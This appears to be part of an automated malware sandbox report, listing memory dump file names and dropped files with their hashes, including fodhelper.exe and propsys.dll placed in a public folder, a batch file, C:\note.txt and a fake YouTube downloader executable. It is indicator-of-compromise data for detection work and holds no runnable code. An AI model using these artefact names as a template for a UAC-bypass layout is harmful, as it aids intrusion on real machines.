memory/1904-2324-0x0000000010480000-0x00000000104C4000-memory.dmp

memory/6532-2325-0x0000000000400000-0x0000000000433000-memory.dmp

memory/3116-2326-0x000000001B100000-0x000000001B110000-memory.dmp

memory/2588-2327-0x0000000010480000-0x00000000104C4000-memory.dmp

memory/3116-2328-0x000000001B100000-0x000000001B110000-memory.dmp

memory/8156-2329-0x0000000000E20000-0x0000000000E30000-memory.dmp

memory/8156-2331-0x0000000000E20000-0x0000000000E30000-memory.dmp

memory/8156-2330-0x0000000000E20000-0x0000000000E30000-memory.dmp

memory/7208-2332-0x0000000002F50000-0x0000000002F60000-memory.dmp

memory/3116-2333-0x00007FFB75A20000-0x00007FFB764E1000-memory.dmp

memory/8156-2334-0x00007FFB75A20000-0x00007FFB764E1000-memory.dmp

memory/8156-2335-0x0000000000E20000-0x0000000000E30000-memory.dmp

memory/8156-2336-0x0000000000E20000-0x0000000000E30000-memory.dmp

memory/7208-2337-0x0000000002F50000-0x0000000002F60000-memory.dmp

memory/3116-2338-0x000000001B100000-0x000000001B110000-memory.dmp

memory/7208-2346-0x00007FFB75A20000-0x00007FFB764E1000-memory.dmp

memory/8156-2347-0x0000000000E20000-0x0000000000E30000-memory.dmp

C:\Users\Public\fodhelper.exe

MD5 7215c73ec1aae35b9e4b1f22c811f85c
SHA1 98551f5184691b65dceba531c4e4975d77cd25a5
SHA256 7e80da8d839dcf05e30317256460ed7a4ee25cab2750d768569aaab35e1e8c64
SHA512 b68eed48dbd32e485fd56b952e3e642f25f1eefe26ea533b13857e225272ee9668c39552284a438175a323d1685a80d9f878ef0637b5d928bb1e1ed1ac505d61

C:\Users\Public\propsys.dll

MD5 487766bf2f0add388cb123d1ef7ece46
SHA1 766564c04d9e8a6745baa2ad28da5d68ad1d79bf
SHA256 fa5d5f9bd3a3aece8941e52a00d05db8910d3332f4f276bc03663c7944ae11cb
SHA512 3b5c285c4eb749c5e34405b38e146e9fc3fe28c535ee12c4e0f075e167768f37b588e50c2dbd43a27b67b11e7483ad51fcd6b6e7638059dd40bc303c664a8a7e

C:\Users\Public\Runex.bat

MD5 f6828e22e6abe87c624e4683fac5889b
SHA1 b93d63354d4ddb226dab90955576a6d2cad05ba0
SHA256 e1b1884353a51436f90dfed9f85ed9dd98fccfbd13dee7aa54fd901f77fe5e9c
SHA512 26afb36afcb3f286b85ebd72061e26f84c33075d3d0767cc93f50ec414a85838c86049e0c56ff43011d1a309b98ae355cbe412203429ac243010dc971ac81ec1

memory/7208-2369-0x0000000002F50000-0x0000000002F60000-memory.dmp

memory/208-2376-0x00007FFB75A20000-0x00007FFB764E1000-memory.dmp

memory/208-2375-0x0000019C2BC10000-0x0000019C2BC32000-memory.dmp

memory/208-2377-0x0000019C2BC00000-0x0000019C2BC10000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aafivkcb.iie.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3116-2382-0x000000001B100000-0x000000001B110000-memory.dmp

memory/3116-2383-0x000000001B100000-0x000000001B110000-memory.dmp

memory/208-2384-0x0000019C2BC00000-0x0000019C2BC10000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\6AdwCleaner.exe.log

MD5 baf55b95da4a601229647f25dad12878
SHA1 abc16954ebfd213733c4493fc1910164d825cac8
SHA256 ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924
SHA512 24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

C:\note.txt

MD5 afa6955439b8d516721231029fb9ca1b
SHA1 087a043cc123c0c0df2ffadcf8e71e3ac86bbae9
SHA256 8e9f20f6864c66576536c0b866c6ffdcf11397db67fe120e972e244c3c022270
SHA512 5da21a31fbc4e8250dffed30f66b896bdf007ac91948140334fe36a3f010e1bac3e70a07e9f3eb9da8633189091fd5cadcabbaacd3e01da0fe7ae28a11b3dddf

C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe

MD5 f33a4e991a11baf336a2324f700d874d
SHA1 9da1891a164f2fc0a88d0de1ba397585b455b0f4
SHA256 a87524035509ff7aa277788e1a9485618665b7da35044d70c41ec0f118f3dfd7
SHA512 edf066968f31451e21c7c21d3f54b03fd5827a8526940c1e449aad7f99624577cbc6432deba49bb86e96ac275f5900dcef8d7623855eb3c808e084601ee1df20